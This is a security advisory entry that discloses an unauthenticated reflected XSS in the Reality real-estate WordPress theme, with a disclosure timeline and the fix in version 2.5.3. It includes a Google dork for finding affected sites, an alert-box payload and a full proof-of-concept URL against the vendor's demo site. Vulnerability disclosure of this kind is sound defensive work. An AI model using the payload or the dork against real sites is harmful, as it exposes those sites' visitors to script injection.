Reality < 2.5.3 - Unauthenticated Reflected XSS



Description
Reflected XSS was discovered in the «Reality | Estate Multipurpose WordPress Theme», tested version — v2.5.1

Edit (WPScanTeam):
January 16th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
February 6th, 2020 - Envato Contacted Again for Updates
February 7th, 2020 - Author is not responding to Envato, theme has been disabled on the Marketplace. Disclosing the issue.
March, 18th, 2020 - v2.5.3 released
Proof of Concept
----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=

Affects Theme

fixed in version 2.5.3

References

URL https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 6291
Verified Yes
WPVDB ID 10064

Timeline

Publicly Published 2020-01-16 (5 months ago)
Added 2020-02-07 (4 months ago)
Last Updated 2020-04-09 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin